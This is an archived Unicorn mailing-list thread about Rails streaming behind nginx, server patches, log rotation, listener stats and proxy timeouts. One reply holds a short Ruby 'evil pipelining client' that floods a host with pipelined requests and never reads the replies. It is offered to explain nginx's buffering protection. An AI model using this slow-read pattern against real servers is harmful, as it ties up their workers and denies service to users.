> streaming without chunking for HTTP/1.0, but only if the client
> didn't set a non-standard HTTP/1.0 header to enable keepalive.  This
> is because HTTP/1.0 (w/o keepalive) relies on the server to close
> the connection to signal the end of a response.

It's clear then. Also, Rails has code that prevents streaming from
being triggered if the request is HTTP/1.0:

https://github.com/rails/rails/blob/master/actionpack/lib/action_controller/metal/streaming.rb#L243-244

> You can use "X-Accel-Buffering: no" if you know your responses are small
> enough to fit into the kernel socket buffers.  There's two kernel
> buffers (Unicorn + nginx), you can get a little more space there.  nginx
> shouldn't make another request to Unicorn if it's blocked writing a
> response to the client already, so an evil pipelining client should not
> hurt unicorn in this case:

Excellent.

Thanks Eric!


* Re: Unicorn and streaming in Rails 3.1
  @ 2011-06-25 20:16  5% ` Eric Wong
  2011-06-25 22:23  0%   ` Xavier Noria
  2011-06-25 20:33  4% ` Eric Wong
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2011-06-25 20:16 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> Streaming works with Unicorn + Apache. Both with and without deflating.
> 
> My understanding is that Unicorn + Apache is not a good combination
> though because Apache does not buffer, and thus Unicorn has no fast
> client in front. (I don't know which is the ultimate technical reason
> Unicorn puts such an emphasis on fast clients, but will do some
> research about it.)

Basically the per-connection overhead of Unicorn is huge, an entire Ruby
process (tens to several hundreds of megabytes).  The per-connection
overhead of nginx is tiny: maybe a few KB in userspace (including
buffers), and a few KB in the kernel.  You don't want to maintain
connections to Unicorn for a long time because of that cost.

OK, if you have any specific questions that aren't answered in the
website, please ask.

> I have seen in
> 
>     http://unicorn.bogomips.org/examples/nginx.conf
> 
> the comment
> 
>     "You normally want nginx to buffer responses to slow
>     clients, even with Rails 3.1 streaming because otherwise a slow
>     client can become a bottleneck of Unicorn."
> 
> If I understand how this works correctly, nginx buffers the entire
> response from Unicorn. First filling what's configured in
> proxy_buffer_size and proxy_buffers, and then going to disk if needed
> as a last resort. Thus, even if the application streams, I believe the
> client will receive the chunked response, but only after it has been
> generated by the application and fully buffered by nginx. Which
> defeats the purpose of streaming

Yes.

> in the use case we have in mind in
> Rails 3.1, which is to serve HEAD as soon as possible.

Small nit: s/HEAD/the response header/   "HEAD" is a /request/ that only
expects to receive the response header.

nginx only sends HTTP/1.0 requests to unicorn, so Rack::Chunked won't
actually send a chunked/streamed response.  Rails 3.1 /could/ enable
streaming without chunking for HTTP/1.0, but only if the client
didn't set a non-standard HTTP/1.0 header to enable keepalive.  This
is because HTTP/1.0 (w/o keepalive) relies on the server to close
the connection to signal the end of a response.

> Is that comment in the example configuration file actually saying that
> Unicorn with nginx buffering is not broken? I mean, that if your
> application has some actions with stream enabled and you put it behind
> this setup, the content will be delivered albeit not streamed?

Correct.

> If that is correct. Is it reasonable to send to nginx the header
> X-Accel-Buffering to disable buffering only for streamed responses? Or
> is it a very bad idea? If it is a real bad idea, is the recommendation
> to Unicorn users that they should just ignore this new feature?

You can use "X-Accel-Buffering: no" if you know your responses are small
enough to fit into the kernel socket buffers.  There's two kernel
buffers (Unicorn + nginx), you can get a little more space there.  nginx
shouldn't make another request to Unicorn if it's blocked writing a
response to the client already, so an evil pipelining client should not
hurt unicorn in this case:

   require "socket"
   host = "example.com"
   s = TCPSocket.new(host, 80)
   req = "GET /something/big HTTP/1.1\r\nHost: #{host}\r\n\r\n"

   # pipeline a large number of requests, nginx won't send another
   # request to an upstream if it's still writing one
   30.times { s.write(req) }

   # don't read the response, or read it slowly, just keep the socket
   # open here...
   sleep
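
On the application side, one way to add that header only for streamed
responses is a tiny middleware.  Rough, untested sketch (the class name
and the no-Content-Length heuristic are just illustrations, not
anything unicorn or Rails ships):

```ruby
# Illustration only: treat responses without a Content-Length as
# streamed and tell nginx not to buffer them; everything else keeps
# the normal (buffered) behavior.
class NoBufferWhenStreaming
  def initialize(app)
    @app = app
  end

  def call(env)
    status, headers, body = @app.call(env)
    headers["X-Accel-Buffering"] = "no" unless headers["Content-Length"]
    [status, headers, body]
  end
end
```

In config.ru this would sit near the top of the stack as
"use NoBufferWhenStreaming", before the app is run.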

-- 
Eric Wong



* Re: Unicorn and streaming in Rails 3.1
    2011-06-25 20:16  5% ` Eric Wong
@ 2011-06-25 20:33  4% ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2011-06-25 20:33 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> If it is a real bad idea, is the recommendation
> to Unicorn users that they should just ignore this new feature?

Another thing, Rainbows! + ThreadSpawn/ThreadPool concurrency may do the
trick (without needing nginx at all).  The per-client overhead of
Rainbows! + threads (several hundred KB) is higher than nginx, but still
much lower than Unicorn.

All your Rails code must be thread-safe, though.

If you use Linux, XEpollThreadPool/XEpollThreadSpawn can be worth a
try, too.  The cost of completely idle keepalive clients should be
roughly in line with nginx.

If you want to forgo thread-safety, Rainbows! + StreamResponseEpoll[1]
+ ForceStreaming middleware[2] may also be an option, too (needs nginx).


Keep in mind that I don't know of anybody using Rainbows! for any
serious sites, so there could still be major bugs :)

Rainbows! http://rainbows.rubyforge.org/


[1] currently in rainbows.git, will probably be released this weekend...

[2] I'll probably move this to Rainbows! instead of a Unicorn branch:
    http://bogomips.org/unicorn.git/tree/lib/unicorn/force_streaming.rb?h=force_streaming
    This is 100% untested, I've never run it.

-- 
Eric Wong



* Re: problem setting multiple cookies
  @ 2011-06-22  1:59  4%                   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-06-22  1:59 UTC (permalink / raw)
  To: unicorn list

Jason Su <jason@lookbook.nu> wrote:
> That's strange, doesn't really explain why cookies work fine on a
> fresh Rails 2.3.8 app, nor why cookies stopped working for me after I
> switched to Unicorn.

Actually, another option you could try is to use OldRails (designed for
Rails <= 2.2) and try to get that working with Rails 2.3.  This should
cause Rails 2.3 to use the cgi_wrapper.rb and not the native Rack
interface:

--------------- config.ru ------------------
require "unicorn/app/old_rails"
use Unicorn::App::OldRails::Static
run Unicorn::App::OldRails.new
--------------------------------------------

-- 
Eric Wong



* Re: [PATCH] examples/nginx.conf: add ipv6only comment
  2011-06-07  2:28  9% [PATCH] examples/nginx.conf: add ipv6only comment Eric Wong
@ 2011-06-07 17:04 10% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-06-07 17:04 UTC (permalink / raw)
  To: mongrel-unicorn

My wording sucked for the original comment, just pushed this out to
unicorn.git (6eefc641c84eaa86cb2be4a2b1983b15efcbfae1)

diff --git a/examples/nginx.conf b/examples/nginx.conf
index 368e19e..cc1038a 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -90,7 +90,7 @@ http {
     # If you have IPv6, you'll likely want to have two separate listeners.
     # One on IPv4 only (the default), and another on IPv6 only instead
     # of a single dual-stack listener.  A dual-stack listener will make
-    # $remote_addr will make IPv4 addresses ugly (e.g ":ffff:10.0.0.1"
+    # for ugly IPv4 addresses in $remote_addr (e.g ":ffff:10.0.0.1"
     # instead of just "10.0.0.1") and potentially trigger bugs in
     # some software.
     # listen [::]:80 ipv6only=on; # deferred or accept_filter recommended
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying



* [PATCH] examples/nginx.conf: add ipv6only comment
@ 2011-06-07  2:28  9% Eric Wong
  2011-06-07 17:04 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-06-07  2:28 UTC (permalink / raw)
  To: mongrel-unicorn

IPv4 addresses started looking very ugly the first time I got
IPv6 working on bogomips.org.  In case somebody else can't stand
how IPv4-mapped-IPv6 addresses look, the workaround is to use
two listeners and ensure the IPv6 one is ipv6only.

Unicorn itself supports IPv6, too, but nobody uses/needs it.
I'll add :ipv6only support shortly (probably tomorrow).

From 32b340b88915ec945ebdbfa11b7da242860a6f44 Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Mon, 6 Jun 2011 19:15:36 -0700
Subject: [PATCH] examples/nginx.conf: add ipv6only comment

IPv4-mapped-IPv6 addresses are fugly.
---
 examples/nginx.conf |    8 ++++++++
 1 files changed, 8 insertions(+), 0 deletions(-)

diff --git a/examples/nginx.conf b/examples/nginx.conf
index 9f245c8..368e19e 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -87,6 +87,14 @@ http {
     # listen 80 default deferred; # for Linux
     # listen 80 default accept_filter=httpready; # for FreeBSD
 
+    # If you have IPv6, you'll likely want to have two separate listeners.
+    # One on IPv4 only (the default), and another on IPv6 only instead
+    # of a single dual-stack listener.  A dual-stack listener will make
+    # $remote_addr will make IPv4 addresses ugly (e.g ":ffff:10.0.0.1"
+    # instead of just "10.0.0.1") and potentially trigger bugs in
+    # some software.
+    # listen [::]:80 ipv6only=on; # deferred or accept_filter recommended
+
     client_max_body_size 4G;
     server_name _;
 
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying



* Re: unicorn stuck in sched_yield after ERESTARTNOHAND
  2011-06-01  0:31  4%       ` Bharanee Rathna
@ 2011-06-01  0:44  0%         ` Bharanee Rathna
  0 siblings, 0 replies; 200+ results
From: Bharanee Rathna @ 2011-06-01  0:44 UTC (permalink / raw)
  To: unicorn list

>> 1) recvfrom() isn't using the MSG_DONTWAIT flag.  I know you're using
>>   Linux, so kgio should be using MSG_DONTWAIT to do non-blocking
>>   recv...  Which versions of unicorn/kgio are you using?
>
> using kgio 2.3.2, i'll upgrade it and give it another try

repeatable with kgio 2.4.1



* Re: unicorn stuck in sched_yield after ERESTARTNOHAND
  @ 2011-06-01  0:31  4%       ` Bharanee Rathna
  2011-06-01  0:44  0%         ` Bharanee Rathna
  0 siblings, 1 reply; 200+ results
From: Bharanee Rathna @ 2011-06-01  0:31 UTC (permalink / raw)
  To: unicorn list

thanks for the quick response eric,

On Wed, Jun 1, 2011 at 9:48 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Bharanee Rathna <deepfryed@gmail.com> wrote:
>> I'm encountering a weird error where the unicorn workers are stuck in
>> a loop after hitting a 500 on the backend sinatra app.
>
> Also, what extensions are you using in your app?

heaps of em. yajl, swift, rmagick, fastcaptcha, flock, nokogiri &
curb.  except swift and curb, none of the others would be touching the
network.

>> strace at the point where it starts to go into a loop of death
>
>> select(7, [4 5], NULL, [3 6], {30, 0})  = 1 (in [5], left {27, 274382})
>> fchmod(8, 01)                           = 0
>> fcntl(5, F_GETFL)                       = 0x802 (flags O_RDWR|O_NONBLOCK)
>> accept4(5, {sa_family=AF_INET, sin_port=htons(56728),
>> sin_addr=inet_addr("10.1.1.4")}, [16], SOCK_CLOEXEC) = 12
>> recvfrom(12, 0x1c99fb0, 16384, 64, 0, 0) = -1 EAGAIN (Resource
>> temporarily unavailable)
>
> (I'm somewhat more awake, now, haven't been sleeping much)
>
> Two things look off in the line above:
>
> 1) recvfrom() isn't using the MSG_DONTWAIT flag.  I know you're using
>   Linux, so kgio should be using MSG_DONTWAIT to do non-blocking
>   recv...  Which versions of unicorn/kgio are you using?

using kgio 2.3.2, i'll upgrade it and give it another try

>
> 2) TCP_DEFER_ACCEPT should prevent recvfrom() from hitting EAGAIN
>   in the common case under Linux.
>
>> select(13, [12], NULL, NULL, NULL)      = ? ERESTARTNOHAND (To be restarted)
>> --- SIGINT (Interrupt) @ 0 (0) ---
>> rt_sigreturn(0x2)                       = -1 EINTR (Interrupted system call)
>
> What triggered SIGINT?

not sure

>
> Actually, after many lines of sched_yield() in your gist, I can see it
> does actually exit the process.  Did you kill it with SIGINT?  If so, I
> see nothing wrong...

yes i killed it after the worker looked stuck and wasn't responding for 30s



* Re: unicorn 1.1.x never-ending listen loop IOError exceptions
  @ 2011-03-23  1:09  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-03-23  1:09 UTC (permalink / raw)
  To: unicorn list

David Nghiem <david@zendesk.com> wrote:
> On Tue, Mar 22, 2011 at 2:39 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > No Errno::EBADF errors at all?
> 
> I didn't check before or after the block of Errno::IOError errors,
> there were enough IOError logs to fill up 40gb of disk.  I'll capture
> the entire deleted log next time.

Yikes.  The first few lines of error messages should be enough.

> >> ruby    15209 zendesk    1w   REG              252,0           0
> >> 3015360 /data/zendesk/log/unicorn.stdout.log
> >> ruby    15209 zendesk    2w   REG              252,0       24585
> >> 3015203 /data/zendesk/log/unicorn.stderr.log-20110110 (deleted)
> >> ruby    15209 zendesk    3w   REG              252,0 61617590073
> >> 3015097 /data/zendesk/log/unicorn.log-20110110 (deleted)
> >
> > Permissions issue during log rotation?  Are you doing "killall -USR1
> > unicorn" by any chance or sending a bunch of USR1 signals faster than
> > unicorn can process them?
> >
> > Try just sending one USR1 to the master process and letting the master
> > signal the workers.
> 
> Are the IOError exceptions and failure to rotate logs related?  My
> wild guess was this specific worker's unix socket got corrupted
> somehow.

There's a good possibility.  The USR1 signal closes a pipe we normally
select() on.  The closed pipe triggers a wakeup from select(), which
triggers the log reopening (and reopening of the pipe).
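
For anyone unfamiliar with the pattern, here's a rough standalone
sketch of that select() wakeup idea.  This is NOT unicorn's actual
code (unicorn closes its internal pipe; this sketch just writes a
byte), but the effect is the same: a signal becomes a readable event:

```ruby
# A signal handler makes the read end of a pipe readable, so a main
# loop blocked in IO.select wakes up and can do slow work (like
# reopening logs) outside of signal-handler context.
rd, wr = IO.pipe

trap(:USR1) { wr.write_nonblock(".") rescue nil }

Process.kill(:USR1, Process.pid)  # pretend someone sent us USR1

# the main loop would normally block here waiting for work or signals
result = if IO.select([rd], nil, nil, 5)
  rd.read_nonblock(1)  # drain the wakeup byte
  "woke up; reopen logs here"
else
  "timed out"
end
```

Doing only the pipe write in the handler keeps the handler trivially
safe; the heavy lifting happens in the normal flow of the main loop.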

Do you see:  "worker=$NUM done reopening logs" messages in your
logs?

Another explanation is that you somehow have a library that does
something along the lines of:

 ObjectSpace.each_object(IO) { |io| io.close unless io.closed? }

-- 
Eric Wong

^ permalink raw reply	[relevance 4%]

* [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix
  2011-01-06  7:20  3% [PATCH] close client socket after closing response body Eric Wong
@ 2011-01-07  0:16  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-01-07  0:16 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> I am wondering if there are any apps affected by this bug (and
> perhaps keeping people from switching Unicorn).
> 
> It's a fairly esoteric case, so I probably won't make another release
> until tomorrow (sleepy now, will probably screw something else up
> or realize something else is broken :)
> 
> Anyways it's pushed out to master and 1.1.x-stable in case people
> want^Wneed it *right* *now*:

I've just released v1.1.6 and v3.3.1 with the fix from last night,
maybe somebody in a dark corner of the web can finally migrate
to Unicorn because of this bugfix :)

-- 
Eric Wong


^ permalink raw reply	[relevance 0%]

* [PATCH] close client socket after closing response body
@ 2011-01-06  7:20  3% Eric Wong
  2011-01-07  0:16  0% ` [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-01-06  7:20 UTC (permalink / raw)
  To: mongrel-unicorn

I am wondering if there are any apps affected by this bug (and
perhaps keeping people from switching Unicorn).

It's a fairly esoteric case, so I probably won't make another release
until tomorrow (sleepy now, will probably screw something else up
or realize something else is broken :)

Anyways it's pushed out to master and 1.1.x-stable in case people
want^Wneed it *right* *now*:

From b72a86f66c722d56a6d77ed1d2779ace6ad103ed Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Wed, 5 Jan 2011 22:39:03 -0800
Subject: [PATCH] close client socket after closing response body

Response bodies may capture the block passed to each
and save it for body.close, so don't close the socket
before we have a chance to call body.close
---
 lib/unicorn/http_response.rb |    1 -
 lib/unicorn/http_server.rb   |    1 +
 t/t0018-write-on-close.sh    |   23 +++++++++++++++++++++++
 t/write-on-close.ru          |   11 +++++++++++

 (Unnecessary unit test case omitted for email)
 test/unit/test_response.rb   |   18 +++++++++---------

 5 files changed, 44 insertions(+), 10 deletions(-)
 create mode 100755 t/t0018-write-on-close.sh
 create mode 100644 t/write-on-close.ru

diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 3a03cd6..62b3ee9 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -38,7 +38,6 @@ module Unicorn::HttpResponse
     end
 
     body.each { |chunk| socket.write(chunk) }
-    socket.close # flushes and uncorks the socket immediately
     ensure
       body.respond_to?(:close) and body.close
   end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index e2a4db7..3a6e51e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -538,6 +538,7 @@ class Unicorn::HttpServer
     end
     @request.headers? or headers = nil
     http_response_write(client, status, headers, body)
+    client.close # flush and uncork socket immediately, no keepalive
   rescue => e
     handle_error(client, e)
   end
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
new file mode 100755
index 0000000..3afefea
--- /dev/null
+++ b/t/t0018-write-on-close.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+. ./test-lib.sh
+t_plan 4 "write-on-close tests for funky response-bodies"
+
+t_begin "setup and start" && {
+	unicorn_setup
+	unicorn -D -c $unicorn_config write-on-close.ru
+	unicorn_wait_start
+}
+
+t_begin "write-on-close response body succeeds" && {
+	test xGoodbye = x"$(curl -sSf http://$listen/)"
+}
+
+t_begin "killing succeeds" && {
+	kill $unicorn_pid
+}
+
+t_begin "check stderr" && {
+	check_stderr
+}
+
+t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
new file mode 100644
index 0000000..54a2f2e
--- /dev/null
+++ b/t/write-on-close.ru
@@ -0,0 +1,11 @@
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+use Rack::ContentType, "text/plain"
+run(lambda { |_| [ 200, [%w(Transfer-Encoding chunked)], WriteOnClose.new ] })
-- 
Eric Wong


^ permalink raw reply related	[relevance 3%]

* Re: listen backlog
  2010-12-04 23:48  0%             ` Eric Wong
@ 2010-12-05  0:02  0%               ` ghazel
  0 siblings, 0 replies; 200+ results
From: ghazel @ 2010-12-05  0:02 UTC (permalink / raw)
  To: unicorn list

On Sat, Dec 4, 2010 at 3:48 PM, Eric Wong <normalperson@yhbt.net> wrote:
> ghazel@gmail.com wrote:
>> On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> > ghazel@gmail.com wrote:
>> >> Using "modprobe inet_diag" made the script spit out a new error:
>> >>
>> >>             address     active     queued
>> >> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
>> >> (RuntimeError)
>> >>         from linux-tcp-listener-stats.rb:42
>> >
>> > I don't think I've ever seen NLMSG_ERROR before.  Are you running
>> > this as the same user that originally bound the listener (the user
>> > of the Unicorn master process)?
>>
>> Yes. I also tried as root, same error.
>>
>> >> $ sudo modprobe -l inet_diag
>> >> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
>> >>
>> >> I dug in to raindrops a little bit, and it seems the error associated
>> >> with the NLMSG_ERROR is -2,
>> >> "No such file or directory".
>> >
>> > Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
>> > 0.0.0.0:9000 if you're bound to that (I had another user on the
>> > raindrops mailing list with that problem).
>>
>> My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
>> for 0.0.0.0:9000 but got the same error.
>
> Ah, can you try "modprobe tcp_diag", too?  I can't remember what other
> quirks there were for ancient kernels.  Hopefully that works, because
> I'd be at a loss otherwise :x

Ah! That worked. Thanks!

-Greg

^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  2010-12-03 22:49  0%           ` ghazel
@ 2010-12-04 23:48  0%             ` Eric Wong
  2010-12-05  0:02  0%               ` ghazel
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-12-04 23:48 UTC (permalink / raw)
  To: unicorn list

ghazel@gmail.com wrote:
> On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > ghazel@gmail.com wrote:
> >> Using "modprobe inet_diag" made the script spit out a new error:
> >>
> >>             address     active     queued
> >> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
> >> (RuntimeError)
> >>         from linux-tcp-listener-stats.rb:42
> >
> > I don't think I've ever seen NLMSG_ERROR before.  Are you running
> > this as the same user that originally bound the listener (the user
> > of the Unicorn master process)?
> 
> Yes. I also tried as root, same error.
> 
> >> $ sudo modprobe -l inet_diag
> >> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
> >>
> >> I dug in to raindrops a little bit, and it seems the error associated
> >> with the NLMSG_ERROR is -2,
> >> "No such file or directory".
> >
> > Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
> > 0.0.0.0:9000 if you're bound to that (I had another user on the
> > raindrops mailing list with that problem).
> 
> My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
> for 0.0.0.0:9000 but got the same error.

Ah, can you try "modprobe tcp_diag", too?  I can't remember what other
quirks there were for ancient kernels.  Hopefully that works, because
I'd be at a loss otherwise :x

-- 
Eric Wong


^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  2010-12-03 21:49  4%         ` Eric Wong
@ 2010-12-03 22:49  0%           ` ghazel
  2010-12-04 23:48  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: ghazel @ 2010-12-03 22:49 UTC (permalink / raw)
  To: unicorn list

On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
> ghazel@gmail.com wrote:
>> Using "modprobe inet_diag" made the script spit out a new error:
>>
>>             address     active     queued
>> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
>> (RuntimeError)
>>         from linux-tcp-listener-stats.rb:42
>
> I don't think I've ever seen NLMSG_ERROR before.  Are you running
> this as the same user that originally bound the listener (the user
> of the Unicorn master process)?

Yes. I also tried as root, same error.

>> $ sudo modprobe -l inet_diag
>> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
>>
>> I dug in to raindrops a little bit, and it seems the error associated
>> with the NLMSG_ERROR is -2,
>> "No such file or directory".
>
> Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
> 0.0.0.0:9000 if you're bound to that (I had another user on the
> raindrops mailing list with that problem).

My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
for 0.0.0.0:9000 but got the same error.

-Greg

^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  @ 2010-12-03 21:49  4%         ` Eric Wong
  2010-12-03 22:49  0%           ` ghazel
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-12-03 21:49 UTC (permalink / raw)
  To: unicorn list

ghazel@gmail.com wrote:
> On Thu, Dec 2, 2010 at 11:35 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > UNIX sockets are faster for nginx <-> Unicorn, but Raindrops is slower
> > dealing with them since Linux doesn't export UNIX sockets stats to
> > netlink the same way it does for TCP sockets.  So there's always a
> > tradeoff :x
> 
> When does that netlink speed difference matter - only when collecting stats?

Yes, the performance difference is only when collecting stats.

> Using "modprobe inet_diag" made the script spit out a new error:
> 
>             address     active     queued
> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
> (RuntimeError)
>         from linux-tcp-listener-stats.rb:42

I don't think I've ever seen NLMSG_ERROR before.  Are you running
this as the same user that originally bound the listener (the user
of the Unicorn master process)?

> $ sudo modprobe -l inet_diag
> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
> 
> I dug in to raindrops a little bit, and it seems the error associated
> with the NLMSG_ERROR is -2,
> "No such file or directory".

Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
0.0.0.0:9000 if you're bound to that (I had another user on the
raindrops mailing list with that problem).

-- 
Eric Wong


^ permalink raw reply	[relevance 4%]

* Re: Unicorn and HAProxy, 500 Internal errors after checks
  @ 2010-12-01 19:58  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-12-01 19:58 UTC (permalink / raw)
  To: unicorn list

Pierre <oct@fotopedia.com> wrote:
> On Wed, Dec 1, 2010 at 5:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Hi Pierre, HAProxy should be configured to send proper HTTP checks and
> > not just TCP connection checks, the problem will go away then.
> 
> I understood this could be fixed this way and we will probably do that
> soon. However, I think this is also the responsibility of Unicorn not
> to reply anything when there's no request or at least log the error
> somewhere :)

I'm not sure how Unicorn is actually replying to anything; does HAProxy
write *anything* to the socket?

Logging those bad connections is another DoS vector I'd rather avoid,
and for connections where nothing is written, not even possible...

If you have TCP_DEFER_ACCEPT (Linux) or accept filters (FreeBSD)
enabled, it's highly likely Unicorn would never see the connection if
the client never wrote to it.
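
As a hedged sketch of that option (the constant is Linux-only, and the
30-second value here is an arbitrary choice for illustration), deferring
accepts on a listener looks like:

```ruby
require "socket"

# Enable TCP_DEFER_ACCEPT on a Linux listener so the kernel only
# completes accept() once the client has actually sent data.
srv = TCPServer.new("127.0.0.1", 0)
if defined?(Socket::TCP_DEFER_ACCEPT)  # Linux-only constant
  srv.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_DEFER_ACCEPT, 30)
  # The kernel rounds the timeout to retransmission boundaries, so the
  # value read back may differ from 30, but it will be non-zero.
  deferred = srv.getsockopt(Socket::IPPROTO_TCP,
                            Socket::TCP_DEFER_ACCEPT).int
  puts "TCP_DEFER_ACCEPT=#{deferred}"
else
  puts "TCP_DEFER_ACCEPT unavailable on this platform"
end
srv.close
```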

> > Also, I
> > can not recommend HAProxy unless you're certain all your clients are on
> > a LAN and can be trusted to never trickle uploads nor reading large
> > responses.
> 
> While I understand that uploads are very complicated to handle on the
> stack (even nginx can be confused at upload sometimes), HAProxy proved
> it was very good at managing tons of connections and high volume
> traffic from the Internet. All the more so as it allows a very high
> level of redundancy at a very small cost that cannot be achieved
> simply otherwise. Do you have any pointers about your worrying
> non-recommendation of HAProxy ?

HAProxy starts writing request bodies to Unicorn as soon as the upload
starts, which means the Unicorn process will be bounded by the speed of
the original client connection.  If multiple clients upload slowly,
then you'll end up hogging many Unicorn workers.

nginx can also limit the size of client uploads (default 1M) to prevent
unnecessary I/O.

If you serve large responses that can't fit in kernel socket buffers,
then Unicorn will get stuck writing out to a client that isn't reading
fast enough.

AFAIK, HAProxy also does not yet maintain keep-alive connections to
clients, whereas nginx does. Keep-alive is important to client browsers;
they can halve their active connections to a site if keep-alive is
supported.

-- 
Eric Wong


^ permalink raw reply	[relevance 4%]

* Re: 502 bad gateway on nginx with recv() failed
  @ 2010-10-24  6:00  5%       ` Naresh V
  0 siblings, 0 replies; 200+ results
From: Naresh V @ 2010-10-24  6:00 UTC (permalink / raw)
  To: unicorn list

On 24 October 2010 04:52, Eric Wong <normalperson@yhbt.net> wrote:
> Naresh V <nareshov@gmail.com> wrote:
>> On 23 October 2010 02:44, Eric Wong <normalperson@yhbt.net> wrote:
>> > Naresh V <nareshov@gmail.com> wrote:
>> >> I'm serving the puppetmaster application with its config.ru through
>> >> unicorn - proxied by nginx.
>> >> I'm using unix sockets, 4 workers, and 2048 backlog.
>> >>
>> >> The clients - after their typical "puppet run" - send back a report to
>> >> the master in YAML.
>> >> Some clients whose reports tend to be large (close to 2mb) get a 502
>> >> bad gateway error and error out.
>> >>
>> >> nginx log:
>> >>
>> >> 2010/10/22 14:20:27 [error] 19461#0: *17115 recv() failed (104:
>> >> Connection reset by peer) while reading response header from upstream,
>> >> client: 1x.yy.zz.x4, server: , request: "PUT /production/report/nagios
>> >> HTTP/1.1", upstream:
>> >> "http://unix:/tmp/.sock:/production/report/nagios", host:
>> >> "puppet:8140"
>> >
>> > Hi Naresh, do you see anything in the Unicorn stderr log file?
>>
>> Hi Eric, I think I caught it:
>>
>> E, [2010-10-22T23:03:30.207455 #10184] ERROR -- : worker=2 PID:10206
>> timeout (60.207392s > 60s), killing
>> I, [2010-10-22T23:03:31.212533 #10184]  INFO -- : reaped
>> #<Process::Status: pid=10206,signaled(SIGKILL=9)> worker=2
>> I, [2010-10-22T23:03:31.214768 #10490]  INFO -- : worker=2 spawned pid=10490
>> I, [2010-10-22T23:03:31.221748 #10490]  INFO -- : worker=2 ready
>>
>> > Is the 2mb report part of the response or request?  Unicorn should
>> > have no problems accepting large requests (Rainbows! defaults the
>> > client_max_body_size to 1mb, just like nginx).
>>
>> It's part of the PUT request, I guess.
>>
>> > It could be Unicorn's internal (default 60s) timeout kicking
>> > in because puppet is slowly reading/generating the 2mb body.
>>
>> I raised the timeout first to 120, then 180 - and I continued to get
>> the 502 (with the logs as above)
>> When I raised it upto 240, puppetd complained:
>
> Interesting.  I'm not familiar with Puppet internals, but is there any
> valid reason it would be taking this long?
>
> Can you tell if the Unicorn worker is doing anything (using up CPU time
> in top) or just blocked on some socket connection to a database or DNS?
> (strace/truss will help).
>
> You should definitely talk to Puppet developers/users about why it's
> taking so long.  HTTP requests taking anywhere near 60s is an eternity,
> I wonder if your Puppet is somehow misconfigured.
>

